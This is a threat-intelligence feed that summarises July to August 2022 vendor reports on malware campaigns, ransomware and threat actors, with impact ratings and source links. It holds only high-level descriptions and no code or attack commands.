The ASEC analysis team has discovered another distribution of malicious Word files with North Korea-related materials. The malicious Word files are distributed under various names, most likely via email, alongside a file related to a specific webinar, and access the C2 through mshta.
Source: https://asec.ahnlab.com/en/37396/
2022-08-04
Malware_campaigns_leveraging_"Dark Utilities"_platform
LOW
Intel Source:
Cisco Talos
Intel Name:
Malware_campaigns_leveraging_"Dark Utilities"_platform
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
Researchers at Cisco Talos have identified a C2-as-a-service (C2aaS) platform known as "Dark Utilities" offering a variety of services such as remote system access, DDoS capabilities and cryptocurrency mining. The payloads provided by the platform support Windows, Linux and Python-based implementations.
Source: https://blog.talosintelligence.com/2022/08/dark-utilities.html
2022-08-04
Deep_Analysis_of_Bumblebee_Malware
LOW
Intel Source:
Cloudsek
Intel Name:
Deep_Analysis_of_Bumblebee_Malware
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
Researchers from CloudSEK carried out a deep analysis of the Bumblebee malware loader, in which the adversaries push ISO files through compromised email chains (known as thread-hijacked emails) to deploy the Bumblebee loader.
Source: https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/?utm_source=rss&utm_medium=rss&utm_campaign=technical-analysis-of-bumblebee-malware-loader
2022-08-04
IcedID_leveraging_PrivateLoader
LOW
Intel Source:
Walmart
Intel Name:
IcedID_leveraging_PrivateLoader
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
Researchers from Walmart have analysed PrivateLoader, which continues to function as an effective loading service and has recently been leveraging SmokeLoader for its loads.
Source: https://medium.com/walmartglobaltech/icedid-leverages-privateloader-7744771bf87f
2022-08-04
Russian_organizations_attacked_with_new_Woody_RAT_malware
LOW
Intel Source:
MalwareBytes
Intel Name:
Russian_organizations_attacked_with_new_Woody_RAT_malware
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
Researchers from the Malwarebytes Threat Intelligence team have identified a new Remote Access Trojan called Woody Rat that allows attackers to remotely control compromised devices and steal information from them.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/08/woody-rat-a-new-feature-rich-malware-spotted-in-the-wild/
2022-08-04
New_campaign_by_Iranian_Threat_Actor
MEDIUM
Intel Source:
Mandiant
Intel Name:
New_campaign_by_Iranian_Threat_Actor
Date of Scan:
2022-08-04
Impact:
MEDIUM
Summary:
Researchers from Mandiant identified a politically motivated disruptive attack against Albanian government organizations. The researchers also noted the use of ROADSWEEP ransomware and the CHIMNEYSWEEP backdoor.
Source: https://www.mandiant.com/resources/likely-iranian-threat-actor-conducts-politically-motivated-disruptive-activity-against
2022-08-04
LOLI_Stealer_A_new_Golang_Based_InfoStealer
LOW
Intel Source:
Cyble
Intel Name:
LOLI_Stealer_A_new_Golang_Based_InfoStealer
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
Cyble researchers came across a new Golang-based infostealer dubbed LOLI Stealer. This stealer was being sold via a MaaS model.
Source: https://blog.cyble.com/2022/08/03/loli-stealer-golang-based-infostealer-spotted-in-the-wild/
2022-08-04
Malware_disguised_as_Legitimate_Software
LOW
Intel Source:
VirusTotal
Intel Name:
Malware_disguised_as_Legitimate_Software
Date of Scan:
2022-08-04
Impact:
LOW
Summary:
Researchers from VirusTotal have analyzed malware samples and found 1,816 samples since January 2020 that masqueraded as legitimate software by packaging the malware in installers for other popular software such as Google Chrome, Malwarebytes, Zoom, Brave, Mozilla Firefox, and Proton VPN.
Source: https://blog.virustotal.com/2022/08/deception-at-scale.html
2022-08-03
Robin_Banks_PhaaS_Targeting_Citibank_Customers
LOW
Intel Source:
IronNet
Intel Name:
Robin_Banks_PhaaS_Targeting_Citibank_Customers
Date of Scan:
2022-08-03
Impact:
LOW
Summary:
Researchers from IronNet have identified the Phishing-as-a-Service platform Robin Banks selling ready-to-use phishing kits to cybercriminals. The kits are used to obtain financial details of victims living in the U.S., the U.K., Canada, and Australia.
Source: https://www.ironnet.com/blog/robin-banks-a-new-phishing-as-a-service-platform
2022-08-02
LockBit_Ransomware_Leveraging_Windows_Defender_to_load_Cobalt_Strike_Payload
MEDIUM
Intel Source:
SentinelOne
Intel Name:
LockBit_Ransomware_Leveraging_Windows_Defender_to_load_Cobalt_Strike_Payload
Date of Scan:
2022-08-02
Impact:
MEDIUM
Summary:
Researchers from SentinelOne have recently investigated LockBit ransomware and found that the threat actor is abusing the Windows Defender command-line tool MpCmdRun.exe to decrypt and load Cobalt Strike payloads.
Source: https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/
2022-08-02
Mars_Stealer_distributing_via_fake_wallet_site
LOW
Intel Source:
Cyble
Intel Name:
Mars_Stealer_distributing_via_fake_wallet_site
Date of Scan:
2022-08-02
Impact:
LOW
Summary:
Cyble Research Labs, in the course of their research, discovered that the threat actors behind Mars Stealer are adopting sophisticated phishing attacks to distribute Mars Stealer and gather user credentials, system information, and other sensitive data.
Source: https://blog.cyble.com/2022/08/02/fake-atomic-wallet-website-distributing-mars-stealer/
2022-08-02
Manjusaka_Offensive_Framework
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
Manjusaka_Offensive_Framework
Date of Scan:
2022-08-02
Impact:
MEDIUM
Summary:
Researchers at Cisco Talos have discovered a new attack framework called Manjusaka. This framework is advertised as a reproduction of the Cobalt Strike framework. Moreover, the implants for the malware are written in the Rust language for Windows and Linux.
Source: https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html
2022-08-02
A_Deep_Dive_Analysis_of_RedLine_Stealer_Malware
LOW
Intel Source:
Security Scorecard
Intel Name:
A_Deep_Dive_Analysis_of_RedLine_Stealer_Malware
Date of Scan:
2022-08-02
Impact:
LOW
Summary:
Researchers have recently conducted an in-depth investigation of RedLine Stealer, which is being distributed through cracked games, applications, and services.
Source: https://securityscorecard.com/research/detailed-analysis-redline-stealer
2022-08-02
An_updated_variant_of_SolidBit_ransomware_new_targets
LOW
Intel Source:
Trendmicro
Intel Name:
An_updated_variant_of_SolidBit_ransomware_new_targets
Date of Scan:
2022-08-02
Impact:
LOW
Summary:
Trend Micro published a technical analysis of a new SolidBit variant that poses as different applications to lure gamers and social media users. SolidBit has been suspected of being a LockBit ransomware copycat. This ransomware group also appears to be planning to expand its operations through these fraudulent apps and its recruitment of ransomware-as-a-service affiliates.
Source: https://www.trendmicro.com/en_us/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamer.html https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/solidbit-ransomware-enters-the-raas-scene-and-takes-aim-at-gamers-and-social-media-users-with-new-variant-/IOCs-SolidBit-Ransomware-Enters-the-RaaS-Scene-and-Takes-Aim-at-Gamers-and-Social-Media-Users-With-New-Variant%20.txt
2022-08-02
Analysis_on_Industrial_Spy_Ransomware
MEDIUM
Intel Source:
Zscaler
Intel Name:
Analysis_on_Industrial_Spy_Ransomware
Date of Scan:
2022-08-02
Impact:
MEDIUM
Summary:
Zscaler published their technical analysis of the Industrial Spy ransomware group, which emerged in April 2022. The group started by ransoming stolen data and more recently has combined these attacks with ransomware. The threat group exfiltrates and sells data on their dark web marketplace, but does not always encrypt a victim's files. They also utilize a combination of RSA and 3DES to encrypt files.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-industrial-spy-ransomware?&web_view=true
2022-08-02
Emotet_Downloader_Leveraging_Regsvr32_tool
LOW
Intel Source:
EclecticIQ
Intel Name:
Emotet_Downloader_Leveraging_Regsvr32_tool
Date of Scan:
2022-08-02
Impact:
LOW
Summary:
Researchers from EclecticIQ have observed an Emotet downloader document that uses the Regsvr32 tool for execution.
Source: https://blog.eclecticiq.com/emotet-downloader-document-uses-regsvr32-for-execution
2022-08-01
A_new_malicious_campaign_LofyLife
LOW
Intel Source:
Securelist
Intel Name:
A_new_malicious_campaign_LofyLife
Date of Scan:
2022-08-01
Impact:
LOW
Summary:
Kaspersky has discovered a new threat in an open-source software repository, dubbed "LofyLife": a malicious campaign to steal tokens and bank card data.
Source: https://securelist.com/lofylife-malicious-npm-packages/107014/
2022-08-01
Multiple_APT_Groups_Leveraging_Quasar_RAT
MEDIUM
Intel Source:
Qualys
Intel Name:
Multiple_APT_Groups_Leveraging_Quasar_RAT
Date of Scan:
2022-08-01
Impact:
MEDIUM
Summary:
Researchers from Qualys have analyzed the Quasar RAT which is widely leveraged by multiple threat actor groups targeting government and private organizations in Southeast Asia and other geographies.
Source: https://www.qualys.com/docs/whitepapers/qualys-wp-stealthy-quasar-evolving-to-lead-the-rat-race-v220727.pdf
2022-08-01
Phishing_Attacks_Increase_Using_Decentralized_IPFS_Network
LOW
Intel Source:
SpiderLabs
Intel Name:
Phishing_Attacks_Increase_Using_Decentralized_IPFS_Network
Date of Scan:
2022-08-01
Impact:
LOW
Summary:
Researchers from SpiderLabs have identified that the decentralized file system 'IPFS' is becoming the new place for hosting phishing sites. They also identified no fewer than 3,000 emails containing IPFS phishing URLs as an attack vector in the last three months.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
2022-08-01
Green_Stone_sample_attributed_to_Iran
LOW
Intel Source:
Inquest
Intel Name:
Green_Stone_sample_attributed_to_Iran
Date of Scan:
2022-08-01
Impact:
LOW
Summary:
Inquest discovered a malicious sample that was uploaded from Iran. The document is a contract for the supply of services to an energy company from southern Iran, «Tavangoostar Niro va Gashtavar Jonob». The document also contains a link to this energy company, www.tavangyl.com. Analysts named it Green Stone since this family of malicious documents containing executable files was not previously known.
Source: https://inquest.net/blog/2022/07/27/green-stone
2022-08-01
Diving_Deep_into_BPFDoor_Malware
LOW
Intel Source:
Qualys
Intel Name:
Diving_Deep_into_BPFDoor_Malware
Date of Scan:
2022-08-01
Impact:
LOW
Summary:
Researchers from the Phishing Defense Center of Cofense have observed a huge variety of phishing techniques. In this, some of the techniques are quite unique in methods of getting the end user to interact with the message.
Source: https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor
2022-08-01
An_increasing_number_of_phishing_emails_containing_IPFS_URLs
LOW
Intel Source:
Trustwave
Intel Name:
An_increasing_number_of_phishing_emails_containing_IPFS_URLs
Date of Scan:
2022-08-01
Impact:
LOW
Summary:
Trustwave noticed an increasing number of phishing emails containing IPFS URLs as their payload. They have also observed more than 3,000 emails containing phishing URLs that utilized IPFS over the past 90 days, and it is evident that IPFS is increasingly becoming a popular platform for phishing websites.
Source: https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/ipfs-the-new-hotbed-of-phishing/
2022-08-01
Attackers_Leveraging_New_Phishing_Techniques
LOW
Intel Source:
Cofense
Intel Name:
Attackers_Leveraging_New_Phishing_Techniques
Date of Scan:
2022-08-01
Impact:
LOW
Summary:
Researchers from the Phishing Defense Center of Cofense have observed a huge variety of phishing techniques. Some of these techniques are quite unique in how they get the end user to interact with the message.
Source: https://cofense.com/blog/countdown-timer-ransomware-themed-phishing-attack
2022-07-29
WebAssembly_frequently_used_for_cryptomining
LOW
Intel Source:
Sucuri
Intel Name:
WebAssembly_frequently_used_for_cryptomining
Date of Scan:
2022-07-29
Impact:
LOW
Summary:
Sucuri was recently contacted by a client who noticed that their computer slowed to a crawl every time they navigated to their own WordPress website. A cursory review of the site files revealed a snippet of code injected into one of the theme files.
Source: https://blog.sucuri.net/2022/07/cryptominers-webassembly-in-website-malware.html
2022-07-29
Analysis_on_Symbiote_Malware
LOW
Intel Source:
Cybergeeks
Intel Name:
Analysis_on_Symbiote_Malware
Date of Scan:
2022-07-29
Impact:
LOW
Summary:
Cybergeeks analyzed the Symbiote Linux malware, whose purpose is to steal credentials from the SSH and SCP processes by hooking the libc read function.
Source: https://cybergeeks.tech/how-to-analyze-linux-malware-a-case-study-of-symbiote/
2022-07-29
North_Korean_threat_actor_SharpTongue
LOW
Intel Source:
Volexity
Intel Name:
North_Korean_threat_actor_SharpTongue
Date of Scan:
2022-07-29
Impact:
LOW
Summary:
Volexity discovered a new mail-theft malware, "SHARPEXT", believed to have been used by the threat actor SharpTongue. This actor is believed to be North Korean in origin and is often publicly referred to under the name Kimsuky.
Source: https://www.volexity.com/blog/2022/07/28/sharptongue-deploys-clever-mail-stealing-browser-extension-sharpext/?s=09
2022-07-29
The_new_discovered_Follina_exploit_used_by_attackers_again
MEDIUM
Intel Source:
ReversingLabs
Intel Name:
The_new_discovered_Follina_exploit_used_by_attackers_again
Date of Scan:
2022-07-29
Impact:
MEDIUM
Summary:
ReversingLabs analyzed three malicious payloads circulating online that have been linked to use of the newly discovered Follina exploit in Microsoft’s Support Diagnostic Tool (MSDT).
Source: https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks
2022-07-29
An_Excel_Infection_Chain
LOW
Intel Source:
Inquest
Intel Name:
An_Excel_Infection_Chain
Date of Scan:
2022-07-29
Impact:
LOW
Summary:
Inquest researchers discovered that the threat actor tempts users into enabling content in Excel in order to run whatever surprise they have hidden inside.
Source: https://inquest.net/blog/2022/07/25/convoluted-infection-chain-using-excel
2022-07-28
KnotWeed_targets_UK_Austria_with_SubZero_malware
MEDIUM
Intel Source:
Microsoft
Intel Name:
KnotWeed_targets_UK_Austria_with_SubZero_malware
Date of Scan:
2022-07-28
Impact:
MEDIUM
Summary:
MSTIC identified an Austria-based private-sector threat actor, dubbed KnotWeed, that has been targeting law firms, banks, and strategic consultancies in Austria, the United Kingdom, and Panama with SubZero malware.
Source: https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/
2022-07-28
A_Korean_Web_Portal_Page_Daum_using_for_Spreading_Phishing_Emails
LOW
Intel Source:
ASEC
Intel Name:
A_Korean_Web_Portal_Page_Daum_using_for_Spreading_Phishing_Emails
Date of Scan:
2022-07-28
Impact:
LOW
Summary:
Researchers from ASEC have discovered the distribution of phishing emails impersonating the Korean web portal Daum, with attackers using attachments to redirect the user to a phishing webpage.
Source: https://asec.ahnlab.com/en/37270/
2022-07-28
Gootkit_Loaders_Updated_TTPs_of_Cobalt_Strike
LOW
Intel Source:
TrendMicro
Intel Name:
Gootkit_Loaders_Updated_TTPs_of_Cobalt_Strike
Date of Scan:
2022-07-28
Impact:
LOW
Summary:
Researchers from Trend Micro have identified the new tactics of Gootkit Loader. It uses fileless techniques to drop Cobalt Strike and other malicious payloads.
Source: https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html?&web_view=true
2022-07-28
Threat_Actors_leveraging_Microsoft_Applications_via_DLL_SideLoading
MEDIUM
Intel Source:
Cyble, SocInvestigations
Intel Name:
Threat_Actors_leveraging_Microsoft_Applications_via_DLL_SideLoading
Date of Scan:
2022-07-28
Impact:
MEDIUM
Summary:
Researchers from Cyble and SOCInvestigation have identified the DLL (Dynamic-Link Library) sideloading technique leveraged by Threat Actors to spread payloads to users using legitimate applications which load malicious DLL files that spoof legitimate ones.
Source: https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/ https://www.socinvestigation.com/threat-actors-leveraging-microsoft-applications-via-dll-sideloading-detection-response/
2022-07-27
IcedID_malware_leveraging_Cobalt_Strike_and_Dark_VNC
LOW
Intel Source:
ISC.SANS
Intel Name:
IcedID_malware_leveraging_Cobalt_Strike_and_Dark_VNC
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
A researcher from ISC SANS provides an analysis of IcedID malware activity involving Dark VNC and Cobalt Strike.
Source: https://isc.sans.edu/diary/rss/28884
2022-07-27
UAC_0041_Group_distributing_Formbook_and_Snake_Keylogger
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0041_Group_distributing_Formbook_and_Snake_Keylogger
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
CERT-UA has analysed a phishing email containing a malicious document attachment related to a "final payment". The document contains an EXE file classified as the RelicRace .NET downloader, the activation of which leads to the running of the payload.
Source: https://cert.gov.ua/article/955924
2022-07-27
Gootloader_expands_its_payload_to_deliver_IcedID_malware
LOW
Intel Source:
Esentire
Intel Name:
Gootloader_expands_its_payload_to_deliver_IcedID_malware
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
eSentire’s Threat Response Unit (TRU) team has recently observed multiple Gootloader infections. One notable Gootloader incident delivered an IcedID loader. The malware targets domain joined machines. The infection starts with the user visiting the infected website with a lure to download a ZIP file.
Source: https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-gootloader-and-icedid
2022-07-27
Diving_Deep_into_Hive_Ransomware
MEDIUM
Intel Source:
Yoroi ZLab
Intel Name:
Diving_Deep_into_Hive_Ransomware
Date of Scan:
2022-07-27
Impact:
MEDIUM
Summary:
Researchers from Yoroi ZLab took a deep dive into Hive ransomware and identified it as one of the most sophisticated active threats. They are also tracking this infamous threat actor and observing any modification in its techniques in order to provide guidance.
Source: https://yoroi.company/research/on-the-footsteps-of-hive-ransomware/?&web_view=true
2022-07-27
Similarities_between_LockBit_3_0_and_BlackMatter_ransomware
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Similarities_between_LockBit_3_0_and_BlackMatter_ransomware
Date of Scan:
2022-07-27
Impact:
MEDIUM
Summary:
Researchers from Trend Micro found similarities between the new version of LockBit and BlackMatter ransomware. LockBit's extensive similarities to BlackMatter come from overlaps in the privilege escalation and harvesting routines used to identify APIs.
Source: https://www.trendmicro.com/en_us/research/22/g/lockbit-ransomware-group-augments-its-latest-variant--lockbit-3-.html
2022-07-27
Analysis_of_SSH_Honeypot_Data_with_PowerBI
LOW
Intel Source:
ISC.SANS
Intel Name:
Analysis_of_SSH_Honeypot_Data_with_PowerBI
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
A researcher from ISC SANS provides some analysis of SSH honeypot data, having experimented for a while with Microsoft PowerBI using honeypot data parsed into comma-delimited (CSV) format.
Source: https://isc.sans.edu/diary.html?date=2022-07-23
2022-07-27
IIS_extensions_persistently_used_as_Exchange_backdoors
LOW
Intel Source:
Microsoft
Intel Name:
IIS_extensions_persistently_used_as_Exchange_backdoors
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
Microsoft says attackers increasingly use malicious Internet Information Services (IIS) web server extensions to backdoor unpatched Exchange servers as they have lower detection rates compared to web shells.
Source: https://www.microsoft.com/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/
2022-07-27
UAC_0100_Group_leveraging_phishing_sites_to_target_Ukrainian_Banks
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0100_Group_leveraging_phishing_sites_to_target_Ukrainian_Banks
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
CERT-UA has discovered an online fraud campaign using phishing sites with the subject line "aid from the Red Cross", targeting popular Ukrainian banks.
Source: https://cert.gov.ua/article/987552
2022-07-27
UAC_0010_Group_leveraging_GammaLoad_PS1_v2_malware_to_target_Ukraine
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0010_Group_leveraging_GammaLoad_PS1_v2_malware_to_target_Ukraine
Date of Scan:
2022-07-27
Impact:
LOW
Summary:
CERT-UA has analysed a phishing email containing a malicious document attachment related to the National Academy of Security of Ukraine. The document contains an HTM dropper, the activation of which leads to the creation of a RAR archive file and then an LNK file; running the LNK file leads to the download and execution of an HTA file.
Source: https://cert.gov.ua/article/971405
2022-07-26
The_Source_Code_of_Luca_Stealer_Malware_Leaked
LOW
Intel Source:
Cyble
Intel Name:
The_Source_Code_of_Luca_Stealer_Malware_Leaked
Date of Scan:
2022-07-26
Impact:
LOW
Summary:
The Cyble Threat Hunting team recently discovered an unknown Rust-based stealer, which is known as Luca Stealer, and the source code of this stealer was leaked on a popular cybercrime forum for free on July 3, 2022.
Source: https://blog.cyble.com/2022/07/25/luca-stealer-source-code-leaked-on-a-cybercrime-forum/
2022-07-26
Attacks_against_a_pair_of_vulnerabilities_in_Microsoft_SQL
LOW
Intel Source:
Sophos
Intel Name:
Attacks_against_a_pair_of_vulnerabilities_in_Microsoft_SQL
Date of Scan:
2022-07-26
Impact:
LOW
Summary:
Sophos Managed Threat Response (MTR) and Sophos Rapid Response have been investigating attacks against Microsoft SQL Server installations. Sophos observed the threat group targeting externally exposed and unpatched SQL servers, and during their initial investigations into this threat group they saw it leveraging malware infrastructure impersonating a download site for KMSAuto, a non-malicious software utility used for evading Windows license key activation.
Source: https://news.sophos.com/en-us/2022/07/20/ooda-x-ops-takes-on-burgeoning-sql-server-attacks/
2022-07-26
New_tool_by_Charming_Kitten_and_its_OPSEC_errors
MEDIUM
Intel Source:
PWC
Intel Name:
New_tool_by_Charming_Kitten_and_its_OPSEC_errors
Date of Scan:
2022-07-26
Impact:
MEDIUM
Summary:
PwC researchers analyzed the activity of the Yellow Garuda threat actor, aka Charming Kitten, and found that they have developed new tools; the researchers also identified the actor's operational security errors.
Source: https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html
2022-07-26
A_New_CosmicStrand_UEFI_Firmware_Rootkit
LOW
Intel Source:
Securelist
Intel Name:
A_New_CosmicStrand_UEFI_Firmware_Rootkit
Date of Scan:
2022-07-26
Impact:
LOW
Summary:
A sophisticated UEFI firmware rootkit has been developed by an unknown Chinese-speaking threat actor, according to security firm Kaspersky. The rootkit is located in the firmware images of Gigabyte or ASUS motherboards, and Kaspersky noticed that all these images are related to designs using the H81 chipset.
Source: https://securelist.com/cosmicstrand-uefi-firmware-rootkit/106973/
2022-07-25
Dot_PLAY_Ransomware
MEDIUM
Intel Source:
NoLogs NoBreach
Intel Name:
Dot_PLAY_Ransomware
Date of Scan:
2022-07-25
Impact:
MEDIUM
Summary:
A threat researcher identified a new ransomware variant, called .PLAY ransomware, during an IR engagement. The researcher confirms that initial access was gained by exploiting FortiGate firewall vulnerabilities over the FortiGate SSL-VPN; after initial access, the threat actors achieved privilege escalation and ransomware deployment in less than 24 hours. Moreover, no C2 traffic or tooling was detected: all actions were carried out over the VPN and through RDP.
Source: https://nologs-nobreach.com/2022/07/24/play-ransomware/
2022-07-25
Costa_Rican_Government_hacked_by_Conti_Ransomware
LOW
Intel Source:
AdvIntel
Intel Name:
Costa_Rican_Government_hacked_by_Conti_Ransomware
Date of Scan:
2022-07-25
Impact:
LOW
Summary:
AdvIntel researchers uncovered how Conti ransomware hacked and encrypted the Costa Rican government, tracing the Russian hackers' steps from an initial foothold to the exfiltration of 672GB of data on April 15.
Source: https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion
2022-07-25
North_Korean_linked_APT37_group_attack_with_Konni_RAT_malware
MEDIUM
Intel Source:
Securonix
Intel Name:
North_Korean_linked_APT37_group_attack_with_Konni_RAT_malware
Date of Scan:
2022-07-25
Impact:
MEDIUM
Summary:
Securonix Threat Labs is investigating a new attack campaign exploiting high-value targets, including North Korea, which could be linked to the North Korean cyber-espionage group APT37.
Source: https://www.securonix.com/blog/stiffbizon-detection-new-attack-campaign-observed/
2022-07-25
Attackers_targeting_unpatched_Atlassian_Confluence_Servers
MEDIUM
Intel Source:
ASEC
Intel Name:
Attackers_targeting_unpatched_Atlassian_Confluence_Servers
Date of Scan:
2022-07-25
Impact:
MEDIUM
Summary:
Researchers from ASEC have observed attackers targeting vulnerable, unpatched Confluence servers. The attackers exploit RCE vulnerabilities and, if successful, can install a web shell or malware to gain control of the infected system.
Source: https://asec.ahnlab.com/en/36820/
2022-07-25
Candiru_Spyware_exploiting_Chrome_Zero_days_in_Middle_East
LOW
Intel Source:
Avast
Intel Name:
Candiru_Spyware_exploiting_Chrome_Zero_days_in_Middle_East
Date of Scan:
2022-07-25
Impact:
LOW
Summary:
Avast researchers discovered a zero-day vulnerability in Google Chrome, which has since been fixed. The vulnerability was weaponized by an Israeli spyware company and used in attacks targeting journalists in the Middle East.
Source: https://decoded.avast.io/janvojtesek/the-return-of-candiru-zero-days-in-the-middle-east/
2022-07-25
Qakbot_continue_with_New_Techniques
LOW
Intel Source:
Cyble
Intel Name:
Qakbot_continue_with_New_Techniques
Date of Scan:
2022-07-25
Impact:
LOW
Summary:
Researchers from Cyble Labs came across a Twitter post in which a user shared new IOCs related to the well-known Qakbot malware.
Source: https://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/
2022-07-25
Magniber_Ransomware_started_using_Windows_installer_package_file
LOW
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_started_using_Windows_installer_package_file
Date of Scan:
2022-07-25
Impact:
LOW
Summary:
Researchers from ASEC have identified that Magniber ransomware has started using a Windows installer package file (.msi) instead of an IE browser vulnerability for its distribution.
Source: https://asec.ahnlab.com/en/37012/
2022-07-25
IcedID_malware_spreading_through_ISO_files
LOW
Intel Source:
ASEC
Intel Name:
IcedID_malware_spreading_through_ISO_files
Date of Scan:
2022-07-25
Impact:
LOW
Summary:
Researchers from ASEC have identified that the IcedID banking malware is being distributed via ISO files. They discovered two methods: the first with the help of Bumblebee malware, and the second with script files and cmd commands.
Source: https://asec.ahnlab.com/en/37005/
2022-07-24
A_malvertising_chain_abusing_Google_s_ad_network
LOW
Intel Source:
MalwareBytes
Intel Name:
A_malvertising_chain_abusing_Google_s_ad_network
Date of Scan:
2022-07-24
Impact:
LOW
Summary:
Malwarebytes researchers uncovered a malvertising chain abusing Google’s ad network to redirect visitors to an infrastructure of tech support scams. Unsuspecting users searching for popular keywords will click an advert and their browser will get hijacked with fake warnings urging them to call rogue Microsoft agents for support.
Source: https://blog.malwarebytes.com/threat-intelligence/2022/07/google-ads-lead-to-major-malvertising-campaign/
2022-07-24
GoMet_2_0_backdoor_attacks_Ukraine
MEDIUM
Intel Source:
Cisco Talos
Intel Name:
GoMet_2_0_backdoor_attacks_Ukraine
Date of Scan:
2022-07-24
Impact:
MEDIUM
Summary:
Cisco Talos has discovered a modified piece of malware targeting Ukraine and confirmed that the malware is a slightly modified version of the open-source backdoor named “GoMet2”.
Source: https://blog.talosintelligence.com/2022/07/attackers-target-ukraine-using-gomet.html
2022-07-22
Magniber_Ransomware_changing_its_Injection_Method
LOW
Intel Source:
ASEC
Intel Name:
Magniber_Ransomware_changing_its_Injection_Method
Date of Scan:
2022-07-22
Impact:
LOW
Summary:
ASEC researchers, who constantly monitor Magniber ransomware, recently found that it has changed its injection method and started being distributed as a Windows installer package file (.msi) on the Edge and Chrome browsers.
Source: https://asec.ahnlab.com/en/36475/
2022-07-22
LockBit_3_0_updated_with_new_techniques
MEDIUM
Intel Source:
Sentinelone
Intel Name:
LockBit_3_0_updated_with_new_techniques
Date of Scan:
2022-07-22
Impact:
MEDIUM
Summary:
Researchers at SentinelLabs have detected new techniques and features in LockBit 3.0. The operators are updating their encryption routines and adding several new features.
Source: https://www.sentinelone.com/labs/lockbit-3-0-update-unpicking-the-ransomwares-latest-anti-analysis-and-evasion-techniques/
2022-07-22
TA4563_leverages_EvilNum_malware_to_target_European_financial_entities
MEDIUM
Intel Source:
ProofPoint
Intel Name:
TA4563_leverages_EvilNum_malware_to_target_European_financial_entities
Date of Scan:
2022-07-22
Impact:
MEDIUM
Summary:
Proofpoint researchers tracked a threat actor they named TA4563, which has been leveraging EvilNum malware to target European financial and investment entities.
Source: https://www.proofpoint.com/us/blog/threat-insight/buy-sell-steal-evilnum-targets-cryptocurrency-forex-commodities
2022-07-22
CNMF_Discloses_Malware_in_Ukraine
MEDIUM
Intel Source:
Mandiant
Intel Name:
CNMF_Discloses_Malware_in_Ukraine
Date of Scan:
2022-07-22
Impact:
MEDIUM
Summary:
Mandiant shared in their blog new malicious activity targeting Ukrainian entities during the ongoing conflict. They highlighted the operations of suspected UNC1151 and suspected UNC2589, which send phishing emails with malicious documents leading to malware infection chains.
Source: https://www.mandiant.com/resources/spear-phish-ukrainian-entities
2022-07-22
Lightning_Framework_A_new_Linux_centric_malware
MEDIUM
Intel Source:
Intezer
Intel Name:
Lightning_Framework_A_new_Linux_centric_malware
Date of Scan:
2022-07-22
Impact:
MEDIUM
Summary:
Researchers at Intezer have detected a new, previously undetected Swiss Army knife-like Linux malware called Lightning Framework.
Source: https://www.intezer.com/blog/research/lightning-framework-new-linux-threat/
2022-07-21
Analysis_of_NukeSped_Malware
LOW
+
Intel Source:
Cyfirma
Intel Name:
Analysis_of_NukeSped_Malware
Date of Scan:
2022-07-21
Impact:
LOW
Summary:
Researchers at Cyfirma analyzed NukeSped malware. The malware is associated with the North Korean APT group Lazarus, which is known to target the US, South Korea, Japan and Asia-Pacific countries.
Source: https://www.cyfirma.com/outofband/nukesped-rat-report/
2022-07-21
Continued_cyber_activity_in_Eastern_Europe
MEDIUM
+
Intel Source:
Google blog
Intel Name:
Continued_cyber_activity_in_Eastern_Europe
Date of Scan:
2022-07-21
Impact:
MEDIUM
Summary:
Google’s Threat Analysis Group (TAG) continues to closely monitor Russian APT activity outside of Ukraine. TAG has disrupted coordinated influence operations from several actors, including the Internet Research Agency and a Russian consulting firm, and reports on activity by the Turla, COLDRIVER and Ghostwriter/UNC1151 groups as well as activity involving the Follina vulnerability.
Source: https://blog.google/threat-analysis-group/continued-cyber-activity-in-eastern-europe-observed-by-tag/
2022-07-21
Redeemer_Ransomware_released_new_version_Redeemer_2_0
MEDIUM
+
Intel Source:
Cyble
Intel Name:
Redeemer_Ransomware_released_new_version_Redeemer_2_0
Date of Scan:
2022-07-21
Impact:
MEDIUM
Summary:
Researchers at Cyble have identified the latest version of Redeemer ransomware on dark web cybercrime forums. The author of Redeemer ransomware released a new version with updated features.
Source: https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/?utm_content=215383953&utm_medium=social&utm_source=twitter&hss_channel=tw-1141929006603866117
2022-07-21
A_new_variant_of_QakBot
LOW
+
Intel Source:
Fortinet
Intel Name:
